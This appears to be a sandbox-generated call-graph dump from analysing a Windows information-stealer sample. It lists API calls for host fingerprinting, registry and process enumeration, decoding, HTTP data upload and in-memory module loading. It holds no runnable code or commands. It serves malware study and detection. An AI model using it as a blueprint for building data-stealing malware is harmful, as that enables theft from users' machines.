76089->76090 76091 405b9d lstrlen memcpy 76090->76091 76640 4170d0 76091->76640 76093 405bc7 lstrlen 76641 4170d0 76093->76641 76095 405bd7 HttpSendRequestA 76096 405be2 InternetReadFile 76095->76096 76097 405c17 InternetCloseHandle 76096->76097 76101 405c0e 76096->76101 76097->76019 76099 416fb0 4 API calls 76099->76101 76100 416ea0 lstrcpy 76100->76101 76101->76096 76101->76097 76101->76099 76101->76100 76642 4170d0 76102->76642 76104 40f3d7 strtok_s 76108 40f3e4 76104->76108 76105 40f4b1 76105->74988 76106 40f48d strtok_s 76106->76108 76107 416e20 lstrlen lstrcpy 76107->76108 76108->76105 76108->76106 76108->76107 76643 4170d0 76109->76643 76111 40f227 strtok_s 76114 40f234 76111->76114 76112 40f387 76112->74996 76113 40f363 strtok_s 76113->76114 76114->76112 76114->76113 76115 40f314 StrCmpCA 76114->76115 76116 40f297 StrCmpCA 76114->76116 76117 40f2d7 StrCmpCA 76114->76117 76118 416e20 lstrlen lstrcpy 76114->76118 76115->76114 76116->76114 76117->76114 76118->76114 76120 416d40 lstrcpy 76119->76120 76121 40fd26 76120->76121 76122 416fb0 4 API calls 76121->76122 76123 40fd37 76122->76123 76124 416ea0 lstrcpy 76123->76124 76125 40fd40 76124->76125 76126 416fb0 4 API calls 76125->76126 76127 40fd5b 76126->76127 76128 416ea0 lstrcpy 76127->76128 76129 40fd64 76128->76129 76130 416fb0 4 API calls 76129->76130 76131 40fd7d 76130->76131 76132 416ea0 lstrcpy 76131->76132 76133 40fd86 76132->76133 76134 416fb0 4 API calls 76133->76134 76135 40fda1 76134->76135 76136 416ea0 lstrcpy 76135->76136 76137 40fdaa 76136->76137 76138 416fb0 4 API calls 76137->76138 76139 40fdc3 76138->76139 76140 416ea0 lstrcpy 76139->76140 76141 40fdcc 76140->76141 76142 416fb0 4 API calls 76141->76142 76143 40fde7 76142->76143 76144 416ea0 lstrcpy 76143->76144 76145 40fdf0 76144->76145 76146 416fb0 4 API calls 76145->76146 76147 40fe09 76146->76147 76148 416ea0 lstrcpy 76147->76148 76149 40fe12 76148->76149 76150 416fb0 4 API calls 76149->76150 76151 40fe2d 76150->76151 76152 416ea0 lstrcpy 76151->76152 76153 40fe36 76152->76153 76154 416fb0 4 API calls 76153->76154 76155 40fe4f 76154->76155 76156 416ea0 lstrcpy 76155->76156 76157 40fe58 76156->76157 76158 416fb0 4 API calls 76157->76158 76159 40fe76 76158->76159 76160 416ea0 lstrcpy 76159->76160 76161 40fe7f 76160->76161 76162 4141c0 6 API calls 76161->76162 76163 40fe96 76162->76163 76164 416f20 3 API calls 76163->76164 76165 40fea9 76164->76165 76166 416ea0 lstrcpy 76165->76166 76167 40feb2 76166->76167 76168 416fb0 4 API calls 76167->76168 76169 40fedc 76168->76169 76170 416ea0 lstrcpy 76169->76170 76171 40fee5 76170->76171 76172 416fb0 4 API calls 76171->76172 76173 40ff05 76172->76173 76174 416ea0 lstrcpy 76173->76174 76175 40ff0e 76174->76175 76644 414300 GetProcessHeap HeapAlloc RegOpenKeyExA 76175->76644 76177 40ff1e 76178 416fb0 4 API calls 76177->76178 76179 40ff2e 76178->76179 76180 416ea0 lstrcpy 76179->76180 76181 40ff37 76180->76181 76182 416fb0 4 API calls 76181->76182 76183 40ff56 76182->76183 76184 416ea0 lstrcpy 76183->76184 76185 40ff5f 76184->76185 76186 416fb0 4 API calls 76185->76186 76187 40ff80 76186->76187 76188 416ea0 lstrcpy 76187->76188 76189 40ff89 76188->76189 76647 414380 GetCurrentProcess IsWow64Process 76189->76647 76192 416fb0 4 API calls 76193 40ffa9 76192->76193 76194 416ea0 lstrcpy 76193->76194 76195 40ffb2 76194->76195 76196 416fb0 4 API calls 76195->76196 76197 40ffd1 76196->76197 76198 416ea0 lstrcpy 76197->76198 76199 40ffda 76198->76199 76200 416fb0 4 API calls 76199->76200 76201 40fffb 76200->76201 76202 416ea0 lstrcpy 76201->76202 76203 410004 76202->76203 76649 4143c0 GetProcessHeap HeapAlloc GetUserNameA 76203->76649 76205 410014 76206 416fb0 4 API calls 76205->76206 76207 410024 76206->76207 76208 416ea0 lstrcpy 76207->76208 76209 41002d 76208->76209 76210 416fb0 4 API calls 76209->76210 76211 41004c 76210->76211 76212 416ea0 lstrcpy 76211->76212 76213 410055 76212->76213 76214 416fb0 4 API calls 76213->76214 76215 410075 76214->76215 76216 416ea0 lstrcpy 76215->76216 76217 41007e 76216->76217 76218 414400 3 API calls 76217->76218 76219 41008e 76218->76219 76220 416fb0 4 API calls 76219->76220 76221 41009e 76220->76221 76222 416ea0 lstrcpy 76221->76222 76223 4100a7 76222->76223 76224 416fb0 4 API calls 76223->76224 76225 4100c6 76224->76225 76226 416ea0 lstrcpy 76225->76226 76227 4100cf 76226->76227 76228 416fb0 4 API calls 76227->76228 76229 4100f0 76228->76229 76230 416ea0 lstrcpy 76229->76230 76231 4100f9 76230->76231 76650 414450 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 76231->76650 76233 410109 76234 416fb0 4 API calls 76233->76234 76235 410119 76234->76235 76236 416ea0 lstrcpy 76235->76236 76237 410122 76236->76237 76238 416fb0 4 API calls 76237->76238 76239 410141 76238->76239 76240 416ea0 lstrcpy 76239->76240 76241 41014a 76240->76241 76242 416fb0 4 API calls 76241->76242 76243 41016b 76242->76243 76244 416ea0 lstrcpy 76243->76244 76245 410174 76244->76245 76651 4144b0 GetProcessHeap HeapAlloc GetTimeZoneInformation 76245->76651 76248 416fb0 4 API calls 76249 410194 76248->76249 76250 416ea0 lstrcpy 76249->76250 76251 41019d 76250->76251 76252 416fb0 4 API calls 76251->76252 76253 4101bc 76252->76253 76254 416ea0 lstrcpy 76253->76254 76255 4101c5 76254->76255 76256 416fb0 4 API calls 76255->76256 76257 4101e5 76256->76257 76258 416ea0 lstrcpy 76257->76258 76259 4101ee 76258->76259 76654 414530 GetUserDefaultLocaleName 76259->76654 76262 416fb0 4 API calls 76263 41020e 76262->76263 76264 416ea0 lstrcpy 76263->76264 76265 410217 76264->76265 76266 416fb0 4 API calls 76265->76266 76267 410236 76266->76267 76268 416ea0 lstrcpy 76267->76268 76269 41023f 76268->76269 76270 416fb0 4 API calls 76269->76270 76271 410260 76270->76271 76272 416ea0 lstrcpy 76271->76272 76273 410269 76272->76273 76659 414570 76273->76659 76275 410280 76276 416f20 3 API calls 76275->76276 76277 410293 76276->76277 76278 416ea0 lstrcpy 76277->76278 76279 41029c 76278->76279 76280 416fb0 4 API calls 76279->76280 76281 4102c6 76280->76281 76282 416ea0 lstrcpy 76281->76282 76283 4102cf 76282->76283 76284 416fb0 4 API calls 76283->76284 76285 4102ef 76284->76285 76286 416ea0 lstrcpy 76285->76286 76287 4102f8 76286->76287 76671 414710 GetSystemPowerStatus 76287->76671 76290 416fb0 4 API calls 76291 410318 76290->76291 76292 416ea0 lstrcpy 76291->76292 76293 410321 76292->76293 76294 416fb0 4 API calls 76293->76294 76295 410340 76294->76295 76296 416ea0 lstrcpy 76295->76296 76297 410349 76296->76297 76298 416fb0 4 API calls 76297->76298 76299 41036a 76298->76299 76300 416ea0 lstrcpy 76299->76300 76301 410373 76300->76301 76302 41037e GetCurrentProcessId 76301->76302 76673 415b70 OpenProcess 76302->76673 76305 416f20 3 API calls 76306 4103a4 76305->76306 76307 416ea0 lstrcpy 76306->76307 76308 4103ad 76307->76308 76309 416fb0 4 API calls 76308->76309 76310 4103d7 76309->76310 76311 416ea0 lstrcpy 76310->76311 76312 4103e0 76311->76312 76313 416fb0 4 API calls 76312->76313 76314 410400 76313->76314 76315 416ea0 lstrcpy 76314->76315 76316 410409 76315->76316 76678 414740 GetProcessHeap HeapAlloc RegOpenKeyExA 76316->76678 76318 410419 76319 416fb0 4 API calls 76318->76319 76320 410429 76319->76320 76321 416ea0 lstrcpy 76320->76321 76322 410432 76321->76322 76323 416fb0 4 API calls 76322->76323 76324 410451 76323->76324 76325 416ea0 lstrcpy 76324->76325 76326 41045a 76325->76326 76327 416fb0 4 API calls 76326->76327 76328 41047b 76327->76328 76329 416ea0 lstrcpy 76328->76329 76330 410484 76329->76330 76681 414800 76330->76681 76333 416fb0 4 API calls 76334 4104a4 76333->76334 76335 416ea0 lstrcpy 76334->76335 76336 4104ad 76335->76336 76337 416fb0 4 API calls 76336->76337 76338 4104cc 76337->76338 76339 416ea0 lstrcpy 76338->76339 76340 4104d5 76339->76340 76341 416fb0 4 API calls 76340->76341 76342 4104f6 76341->76342 76343 416ea0 lstrcpy 76342->76343 76344 4104ff 76343->76344 76696 4147c0 GetSystemInfo wsprintfA 76344->76696 76346 41050f 76347 416fb0 4 API calls 76346->76347 76348 41051f 76347->76348 76349 416ea0 lstrcpy 76348->76349 76350 410528 76349->76350 76351 416fb0 4 API calls 76350->76351 76352 410547 76351->76352 76353 416ea0 lstrcpy 76352->76353 76354 410550 76353->76354 76355 416fb0 4 API calls 76354->76355 76356 410570 76355->76356 76357 416ea0 lstrcpy 76356->76357 76358 410579 76357->76358 76697 414960 GetProcessHeap HeapAlloc 76358->76697 76360 410589 76361 416fb0 4 API calls 76360->76361 76362 410599 76361->76362 76363 416ea0 lstrcpy 76362->76363 76364 4105a2 76363->76364 76365 416fb0 4 API calls 76364->76365 76366 4105c1 76365->76366 76367 416ea0 lstrcpy 76366->76367 76368 4105ca 76367->76368 76369 416fb0 4 API calls 76368->76369 76370 4105eb 76369->76370 76371 416ea0 lstrcpy 76370->76371 76372 4105f4 76371->76372 76702 414ed0 76372->76702 76375 416f20 3 API calls 76376 41061e 76375->76376 76377 416ea0 lstrcpy 76376->76377 76378 410627 76377->76378 76379 416fb0 4 API calls 76378->76379 76380 410651 76379->76380 76381 416ea0 lstrcpy 76380->76381 76382 41065a 76381->76382 76383 416fb0 4 API calls 76382->76383 76384 41067a 76383->76384 76385 416ea0 lstrcpy 76384->76385 76386 410683 76385->76386 76387 416fb0 4 API calls 76386->76387 76388 4106a2 76387->76388 76389 416ea0 lstrcpy 76388->76389 76390 4106ab 76389->76390 76707 414a00 76390->76707 76392 4106c2 76393 416f20 3 API calls 76392->76393 76394 4106d5 76393->76394 76395 416ea0 lstrcpy 76394->76395 76396 4106de 76395->76396 76397 416fb0 4 API calls 76396->76397 76398 41070a 76397->76398 76399 416ea0 lstrcpy 76398->76399 76400 410713 76399->76400 76401 416fb0 4 API calls 76400->76401 76402 410732 76401->76402 76403 416ea0 lstrcpy 76402->76403 76404 41073b 76403->76404 76405 416fb0 4 API calls 76404->76405 76406 41075c 76405->76406 76407 416ea0 lstrcpy 76406->76407 76408 410765 76407->76408 76409 416fb0 4 API calls 76408->76409 76410 410784 76409->76410 76411 416ea0 lstrcpy 76410->76411 76412 41078d 76411->76412 76413 416fb0 4 API calls 76412->76413 76414 4107ae 76413->76414 76415 416ea0 lstrcpy 76414->76415 76416 4107b7 76415->76416 76715 414ae0 76416->76715 76418 4107d3 76419 416f20 3 API calls 76418->76419 76420 4107e6 76419->76420 76421 416ea0 lstrcpy 76420->76421 76422 4107ef 76421->76422 76423 416fb0 4 API calls 76422->76423 76424 410819 76423->76424 76425 416ea0 lstrcpy 76424->76425 76426 410822 76425->76426 76427 416fb0 4 API calls 76426->76427 76428 410843 76427->76428 76429 416ea0 lstrcpy 76428->76429 76430 41084c 76429->76430 76431 414ae0 17 API calls 76430->76431 76432 410868 76431->76432 76433 416f20 3 API calls 76432->76433 76434 41087b 76433->76434 76435 416ea0 lstrcpy 76434->76435 76436 410884 76435->76436 76437 416fb0 4 API calls 76436->76437 76438 4108ae 76437->76438 76439 416ea0 lstrcpy 76438->76439 76440 4108b7 76439->76440 76441 416fb0 4 API calls 76440->76441 76442 4108d6 76441->76442 76443 416ea0 lstrcpy 76442->76443 76444 4108df 76443->76444 76445 416fb0 4 API calls 76444->76445 76446 410900 76445->76446 76447 416ea0 lstrcpy 76446->76447 76448 410909 76447->76448 76751 414de0 76448->76751 76450 410920 76451 416f20 3 API calls 76450->76451 76452 410933 76451->76452 76453 416ea0 lstrcpy 76452->76453 76454 41093c 76453->76454 76455 41095a lstrlen 76454->76455 76456 41096a 76455->76456 76457 416d40 lstrcpy 76456->76457 76458 41097c 76457->76458 76459 401500 lstrcpy 76458->76459 76460 41098a 76459->76460 76761 404dc0 76460->76761 76462 410996 76462->75000 76942 4170d0 76463->76942 76465 404cc9 InternetOpenUrlA 76469 404ce1 76465->76469 76466 404cea InternetReadFile 76466->76469 76467 404d5c InternetCloseHandle InternetCloseHandle 76468 404da8 76467->76468 76468->75004 76469->76466 76469->76467 76943 4092b0 76470->76943 76472 40ef93 76473 40f1cf 76472->76473 76475 40efb4 76472->76475 76474 401500 lstrcpy 76473->76474 76476 40f1dd 76474->76476 76477 40efcd StrCmpCA 76475->76477 77107 40ea90 76476->77107 76479 40f04f 76477->76479 76480 40efd8 76477->76480 76483 40f06e StrCmpCA 76479->76483 76482 416da0 lstrcpy 76480->76482 76484 40eff0 76482->76484 76485 40f07d 76483->76485 76522 40f14e 76483->76522 76486 401500 lstrcpy 76484->76486 76487 416d40 lstrcpy 76485->76487 76488 40f01e 76486->76488 76490 40f08a 76487->76490 76491 416da0 lstrcpy 76488->76491 76489 40f17d StrCmpCA 76493 40f188 76489->76493 76494 40f1c7 76489->76494 76495 416fb0 4 API calls 76490->76495 76492 40f032 76491->76492 76496 416da0 lstrcpy 76492->76496 76497 401500 lstrcpy 76493->76497 76494->75008 76498 40f0b2 76495->76498 76499 40f04a 76496->76499 76500 40f196 76497->76500 76501 416f20 3 API calls 76498->76501 76946 40e420 76499->76946 76503 416da0 lstrcpy 76500->76503 76504 40f0b9 76501->76504 76505 40f1aa 76503->76505 76506 416fb0 4 API calls 76504->76506 76508 416da0 lstrcpy 76505->76508 76507 40f0c0 76506->76507 76509 416ea0 lstrcpy 76507->76509 76510 40f1c2 76508->76510 76512 40f0c9 76509->76512 77062 40e910 76510->77062 76522->76489 76600 404486 76599->76600 76631 414ff0 malloc 76600->76631 76602 4044af 76632 414ff0 malloc 76602->76632 76604 4044c5 76633 414ff0 malloc 76604->76633 76606 4044db 76607 4044f5 lstrlen 76606->76607 76634 4170d0 76607->76634 76609 404505 InternetCrackUrlA 76610 404524 76609->76610 76610->75788 76612 416d40 lstrcpy 76611->76612 76613 415274 76612->76613 76614 416d40 lstrcpy 76613->76614 76615 415282 GetSystemTime 76614->76615 76617 415299 76615->76617 76616 416da0 lstrcpy 76618 4152fc 76616->76618 76617->76616 76618->75803 76620 416f31 76619->76620 76621 416f88 76620->76621 76623 416f68 lstrcpy lstrcat 76620->76623 76622 416da0 lstrcpy 76621->76622 76624 416f94 76622->76624 76623->76621 76624->75806 76625->75921 76627 4094d9 LocalAlloc 76626->76627 76628 404bae 76626->76628 76627->76628 76629 4094f4 CryptStringToBinaryA 76627->76629 76628->75809 76628->75812 76629->76628 76630 409519 LocalFree 76629->76630 76630->76628 76631->76602 76632->76604 76633->76606 76634->76609 76635->75931 76636->76083 76637->76085 76638->76087 76639->76089 76640->76093 76641->76095 76642->76104 76643->76111 76645 414362 RegCloseKey 76644->76645 76646 414345 RegQueryValueExA 76644->76646 76645->76177 76646->76645 76648 40ff99 76647->76648 76648->76192 76649->76205 76650->76233 76652 4144f7 wsprintfA 76651->76652 76653 410184 76651->76653 76652->76653 76653->76248 76655 4101fe 76654->76655 76656 41455a 76654->76656 76655->76262 76923 415420 LocalAlloc CharToOemW 76656->76923 76658 414566 76658->76655 76660 416d40 lstrcpy 76659->76660 76661 414589 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 76660->76661 76670 4145e2 76661->76670 76662 414603 GetLocaleInfoA 76662->76670 76663 4146d5 76664 4146e5 76663->76664 76665 4146db LocalFree 76663->76665 76667 416da0 lstrcpy 76664->76667 76665->76664 76666 416fb0 lstrcpy lstrlen lstrcpy lstrcat 76666->76670 76668 4146f4 76667->76668 76668->76275 76669 416ea0 lstrcpy 76669->76670 76670->76662 76670->76663 76670->76666 76670->76669 76672 410308 76671->76672 76672->76290 76674 415b93 K32GetModuleFileNameExA CloseHandle 76673->76674 76675 415bb5 76673->76675 76674->76675 76676 416d40 lstrcpy 76675->76676 76677 410391 76676->76677 76677->76305 76679 4147a2 RegCloseKey 76678->76679 76680 414785 RegQueryValueExA 76678->76680 76679->76318 76680->76679 76682 414836 GetLogicalProcessorInformationEx 76681->76682 76683 414855 GetLastError 76682->76683 76686 4148ab 76682->76686 76684 414860 76683->76684 76685 41489f 76683->76685 76694 414869 76684->76694 76689 410494 76685->76689 76927 4150f0 GetProcessHeap HeapFree 76685->76927 76926 4150f0 GetProcessHeap HeapFree 76686->76926 76689->76333 76692 4148fd 76692->76689 76695 414906 wsprintfA 76692->76695 76693 414893 76693->76689 76694->76682 76694->76693 76924 4150f0 GetProcessHeap HeapFree 76694->76924 76925 415110 GetProcessHeap HeapAlloc 76694->76925 76695->76689 76696->76346 76698 415090 76697->76698 76699 41498a GlobalMemoryStatusEx 76698->76699 76700 4149a0 __aulldiv 76699->76700 76701 4149d8 wsprintfA 76700->76701 76701->76360 76703 414ee8 GetProcessHeap HeapAlloc wsprintfA 76702->76703 76705 416d40 lstrcpy 76703->76705 76706 41060b 76705->76706 76706->76375 76708 416d40 lstrcpy 76707->76708 76714 414a16 76708->76714 76709 414a50 76711 416da0 lstrcpy 76709->76711 76710 416fb0 lstrcpy lstrlen lstrcpy lstrcat 76710->76714 76712 414ac9 76711->76712 76712->76392 76713 416ea0 lstrcpy 76713->76714 76714->76709 76714->76710 76714->76713 76716 416d40 lstrcpy 76715->76716 76717 414af9 RegOpenKeyExA 76716->76717 76718 414b4b 76717->76718 76719 414b6d 76717->76719 76720 416da0 lstrcpy 76718->76720 76721 414db0 RegCloseKey 76719->76721 76722 414b95 RegEnumKeyExA 76719->76722 76731 414b5a 76720->76731 76725 416da0 lstrcpy 76721->76725 76723 414dab 76722->76723 76724 414bdc wsprintfA RegOpenKeyExA 76722->76724 76723->76721 76726 414c22 RegCloseKey RegCloseKey 76724->76726 76727 414c5e RegQueryValueExA 76724->76727 76725->76731 76728 416da0 lstrcpy 76726->76728 76729 414c97 lstrlen 76727->76729 76730 414d9e RegCloseKey 76727->76730 76728->76731 76729->76730 76732 414cad 76729->76732 76730->76723 76731->76418 76733 416fb0 4 API calls 76732->76733 76734 414cc4 76733->76734 76735 416ea0 lstrcpy 76734->76735 76736 414cd0 76735->76736 76737 416fb0 4 API calls 76736->76737 76738 414cf4 76737->76738 76739 416ea0 lstrcpy 76738->76739 76740 414d00 76739->76740 76741 414d0b RegQueryValueExA 76740->76741 76741->76730 76742 414d40 76741->76742 76743 416fb0 4 API calls 76742->76743 76744 414d57 76743->76744 76745 416ea0 lstrcpy 76744->76745 76746 414d63 76745->76746 76747 416fb0 4 API calls 76746->76747 76748 414d87 76747->76748 76749 416ea0 lstrcpy 76748->76749 76750 414d93 76749->76750 76750->76730 76752 416d40 lstrcpy 76751->76752 76753 414df9 CreateToolhelp32Snapshot Process32First 76752->76753 76754 414e25 Process32Next 76753->76754 76755 414e9a CloseHandle 76753->76755 76754->76755 76757 414e3a 76754->76757 76756 416da0 lstrcpy 76755->76756 76758 414eb3 76756->76758 76757->76754 76759 416fb0 lstrcpy lstrlen lstrcpy lstrcat 76757->76759 76760 416ea0 lstrcpy 76757->76760 76758->76450 76759->76757 76760->76757 76762 416da0 lstrcpy 76761->76762 76763 404dd9 76762->76763 76764 404470 3 API calls 76763->76764 76765 404de5 76764->76765 76928 4155a0 76765->76928 76767 404e3e 76768 404e49 lstrlen 76767->76768 76769 404e59 76768->76769 76770 4155a0 4 API calls 76769->76770 76771 404e6a 76770->76771 76772 416d40 lstrcpy 76771->76772 76773 404e7d 76772->76773 76774 416d40 lstrcpy 76773->76774 76775 404e8a 76774->76775 76776 416d40 lstrcpy 76775->76776 76777 404e97 76776->76777 76778 416d40 lstrcpy 76777->76778 76779 404ea4 76778->76779 76780 416d40 lstrcpy 76779->76780 76781 404eb1 InternetOpenA StrCmpCA 76780->76781 76782 404ee3 76781->76782 76783 405578 InternetCloseHandle 76782->76783 76784 415260 3 API calls 76782->76784 76790 40558d ctype 76783->76790 76785 404f02 76784->76785 76786 416f20 3 API calls 76785->76786 76787 404f15 76786->76787 76788 416ea0 lstrcpy 76787->76788 76789 404f1e 76788->76789 76791 416fb0 4 API calls 76789->76791 76793 416da0 lstrcpy 76790->76793 76792 404f5f 76791->76792 76794 416f20 3 API calls 76792->76794 76802 4055c7 76793->76802 76795 404f66 76794->76795 76796 416fb0 4 API calls 76795->76796 76797 404f6d 76796->76797 76798 416ea0 lstrcpy 76797->76798 76799 404f76 76798->76799 76800 416fb0 4 API calls 76799->76800 76801 404fb7 76800->76801 76803 416f20 3 API calls 76801->76803 76802->76462 76804 404fbe 76803->76804 76805 416ea0 lstrcpy 76804->76805 76806 404fc7 76805->76806 76807 404fdd InternetConnectA 76806->76807 76807->76783 76808 40500d HttpOpenRequestA 76807->76808 76810 40556b InternetCloseHandle 76808->76810 76811 40506b 76808->76811 76810->76783 76812 416fb0 4 API calls 76811->76812 76813 40507f 76812->76813 76814 416ea0 lstrcpy 76813->76814 76815 405088 76814->76815 76816 416f20 3 API calls 76815->76816 76817 4050a6 76816->76817 76818 416ea0 lstrcpy 76817->76818 76819 4050af 76818->76819 76820 416fb0 4 API calls 76819->76820 76821 4050ce 76820->76821 76822 416ea0 lstrcpy 76821->76822 76823 4050d7 76822->76823 76824 416fb0 4 API calls 76823->76824 76825 4050f8 76824->76825 76826 416ea0 lstrcpy 76825->76826 76827 405101 76826->76827 76828 416fb0 4 API calls 76827->76828 76829 405122 76828->76829 76830 416ea0 lstrcpy 76829->76830 76923->76658 76924->76694 76925->76694 76926->76692 76927->76689 76929 4155a9 76928->76929 76930 4155ad CryptBinaryToStringA 76928->76930 76929->76767 76930->76929 76931 4155ce GetProcessHeap HeapAlloc 76930->76931 76932 4155f4 ctype 76931->76932 76934 4155f0 76931->76934 76933 415605 CryptBinaryToStringA 76932->76933 76933->76934 76934->76929 76942->76465 77182 409260 76943->77182 76945 4092c1 76945->76472 76947 416d40 lstrcpy 76946->76947 76948 40e436 76947->76948 77241 4154e0 76948->77241 77063 416d40 lstrcpy 77062->77063 77108 416d40 lstrcpy 77107->77108 77109 40eaa6 77108->77109 77110 4154e0 2 API calls 77109->77110 77111 40eabb 77110->77111 77112 416f20 3 API calls 77111->77112 77113 40eacb 77112->77113 77114 416ea0 lstrcpy 77113->77114 77115 40ead4 77114->77115 77116 416fb0 4 API calls 77115->77116 77117 40eaf8 77116->77117 77187 414ff0 malloc 77182->77187 77184 40926d 77188 406990 77184->77188 77186 40928c ctype 77186->76945 77187->77184 77191 406730 77188->77191 77192 406753 77191->77192 77208 406749 77191->77208 77209 405f20 77192->77209 77196 4067ae 77196->77208 77221 4063a0 77196->77221 77200 40683a 77201 4068d6 VirtualFree 77200->77201 77203 4068e7 77200->77203 77200->77208 77201->77203 77202 406931 77202->77208 77237 4150f0 GetProcessHeap HeapFree 77202->77237 77203->77202 77204 406916 FreeLibrary 77203->77204 77205 406928 77203->77205 77204->77203 77236 4150f0 GetProcessHeap HeapFree 77205->77236 77208->77186 77211 405f32 77209->77211 77210 405f39 77210->77208 77215 406050 77210->77215 77211->77210 77212 405fbe 77211->77212 77238 415110 GetProcessHeap HeapAlloc 77212->77238 77214 405fe0 77214->77210 77220 40607f VirtualAlloc 77215->77220 77217 406120 77218 406133 VirtualAlloc 77217->77218 77219 40612c 77217->77219 77218->77219 77219->77196 77220->77217 77220->77219 77222 4063b9 77221->77222 77224 4063c5 77221->77224 77223 4063f9 LoadLibraryA 77222->77223 77222->77224 77225 406418 77223->77225 77226 406422 77223->77226 77224->77208 77232 4065d0 77224->77232 77225->77224 77229 4064cc 77226->77229 77239 415110 GetProcessHeap HeapAlloc 77226->77239 77228 406594 GetProcAddress 77228->77225 77228->77229 77229->77225 77229->77228 77230 40647b 77230->77225 77240 4150f0 GetProcessHeap HeapFree 77230->77240 77234 4065eb 77232->77234 77233 406699 77233->77200 77234->77233 77235 406670 VirtualProtect 77234->77235 77235->77233 77235->77234 77236->77202 77237->77208 77238->77214 77239->77230 77240->77229 78102 6cfcb8ae 78103 6cfcb8ba ___scrt_is_nonwritable_in_current_image 78102->78103 78104 6cfcb8e3 dllmain_raw 78103->78104 78105 6cfcb8de 78103->78105 78114 6cfcb8c9 78103->78114 78106 6cfcb8fd dllmain_crt_dispatch 78104->78106 78104->78114 78115 6cfabed0 DisableThreadLibraryCalls LoadLibraryExW 78105->78115 78106->78105 78106->78114 78108 6cfcb91e 78109 6cfcb94a 78108->78109 78116 6cfabed0 DisableThreadLibraryCalls LoadLibraryExW 78108->78116 78110 6cfcb953 dllmain_crt_dispatch 78109->78110 78109->78114 78112 6cfcb966 dllmain_raw 78110->78112 78110->78114 78112->78114 78113 6cfcb936 dllmain_crt_dispatch dllmain_raw 78113->78109 78115->78108 78116->78113 78117 6cfcb694 78118 6cfcb6a0 ___scrt_is_nonwritable_in_current_image 78117->78118 78147 6cfcaf2a 78118->78147 78120 6cfcb6a7 78121 6cfcb796 78120->78121 78122 6cfcb6d1 78120->78122 78130 6cfcb6ac ___scrt_is_nonwritable_in_current_image 78120->78130 78164 6cfcb1f7 IsProcessorFeaturePresent 78121->78164 78151 6cfcb064 78122->78151 78125 6cfcb6e0 __RTC_Initialize 78125->78130 78154 6cfcbf89 InitializeSListHead 78125->78154 78126 6cfcb79d ___scrt_is_nonwritable_in_current_image 78127 6cfcb7b3 ___scrt_uninitialize_crt __RTC_Initialize 78126->78127 78131 6cfcb828 78126->78131 78132 6cfcb7d2 78126->78132 78129 6cfcb6ee ___scrt_initialize_default_local_stdio_options 78133 6cfcb6f3 _initterm_e 78129->78133 78134 6cfcb1f7 ___scrt_fastfail 6 API calls 78131->78134 78168 6cfcb09d _execute_onexit_table _cexit ___scrt_release_startup_lock 78132->78168 78133->78130 78136 6cfcb708 78133->78136 78137 6cfcb82f 78134->78137 78155 6cfcb072 78136->78155 78142 6cfcb86e dllmain_crt_process_detach 78137->78142 78143 6cfcb83b 78137->78143 78138 6cfcb7d7 78169 6cfcbf95 __std_type_info_destroy_list 78138->78169 78141 6cfcb70d 78141->78130 78144 6cfcb711 _initterm 78141->78144 78146 6cfcb840 78142->78146 78145 6cfcb860 dllmain_crt_process_attach 78143->78145 78143->78146 78144->78130 78145->78146 78148 6cfcaf33 78147->78148 78170 6cfcb341 IsProcessorFeaturePresent 78148->78170 78150 6cfcaf3f ___scrt_uninitialize_crt 78150->78120 78171 6cfcaf8b 78151->78171 78153 6cfcb06b 78153->78125 78154->78129 78156 6cfcb077 ___scrt_release_startup_lock 78155->78156 78157 6cfcb07b 78156->78157 78158 6cfcb082 78156->78158 78181 6cfcb341 IsProcessorFeaturePresent 78157->78181 78161 6cfcb087 _configure_narrow_argv 78158->78161 78160 6cfcb080 78160->78141 78162 6cfcb095 _initialize_narrow_environment 78161->78162 78163 6cfcb092 78161->78163 78162->78160 78163->78141 78165 6cfcb20c ___scrt_fastfail 78164->78165 78166 6cfcb218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 78165->78166 78167 6cfcb302 ___scrt_fastfail 78166->78167 78167->78126 78168->78138 78169->78127 78170->78150 78172 6cfcaf9e 78171->78172 78173 6cfcaf9a 78171->78173 78174 6cfcafab ___scrt_release_startup_lock 78172->78174 78175 6cfcb028 78172->78175 78173->78153 78178 6cfcafb8 _initialize_onexit_table 78174->78178 78179 6cfcafd6 78174->78179 78176 6cfcb1f7 ___scrt_fastfail 6 API calls 78175->78176 78177 6cfcb02f 78176->78177 78178->78179 78180 6cfcafc7 _initialize_onexit_table 78178->78180 78179->78153 78180->78179 78181->78160 78182 6cfac930 GetSystemInfo VirtualAlloc 78183 6cfac9a3 GetSystemInfo 78182->78183 78184 6cfac973 78182->78184 78186 6cfac9d0 78183->78186 78187 6cfac9b6 78183->78187 78198 6cfcb320 5 API calls ___raise_securityfailure 78184->78198 78186->78184 78190 6cfac9d8 VirtualAlloc 78186->78190 78187->78186 78189 6cfac9bd 78187->78189 78188 6cfac99b 78189->78184 78191 6cfac9c1 VirtualFree 78189->78191 78192 6cfac9ec 78190->78192 78193 6cfac9f0 78190->78193 78191->78184 78192->78184 78199 6cfccbe8 GetCurrentProcess TerminateProcess 78193->78199 78198->78188 78200 6cfcb9c0 78201 6cfcb9ce dllmain_dispatch 78200->78201 78202 6cfcb9c9 78200->78202 78204 6cfcbef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 78202->78204 78204->78201 78205 6cfcb830 78206 6cfcb86e dllmain_crt_process_detach 78205->78206 78207 6cfcb83b 78205->78207 78209 6cfcb840 78206->78209 78208 6cfcb860 dllmain_crt_process_attach 78207->78208 78207->78209 78208->78209

                                                                                                      Executed Functions

                                                                                                      Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE2E8), ref: 0041625D
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE228), ref: 00416275
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF580), ref: 0041628E
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF610), ref: 004162A6
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF760), ref: 004162BE
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF778), ref: 004162D7
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBD178), ref: 004162EF
